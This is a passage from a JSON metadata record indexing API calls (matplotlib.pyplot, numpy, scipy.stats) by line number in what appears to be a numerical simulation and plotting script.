"matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 629, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 630, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 630, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 631, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 631, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 632, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 632, "usage_type": "name"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 635, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 635, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 641, "usage_type": "call"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 642, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 642, "usage_type": "name"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 643, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 643, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 645, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 645, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 646, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 646, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 647, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 647, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 648, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 648, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 649, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 649, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 650, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 650, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 651, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 651, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 653, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 653, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 661, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 662, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 662, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 662, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 665, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 665, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 666, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 670, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 670, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 674, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 676, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 676, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 677, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 677, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 678, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 678, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 679, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 679, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 680, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 680, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 681, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 682, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 682, "usage_type": "name"}, {"api_name": "numpy.maximum", "line_number": 685, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 686, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 686, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 688, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 688, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 690, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 690, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 
692, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 694, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 696, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 696, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 697, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 697, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 698, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 698, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 699, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 699, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 700, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 700, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 701, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 701, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 702, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 702, "usage_type": "name"}]}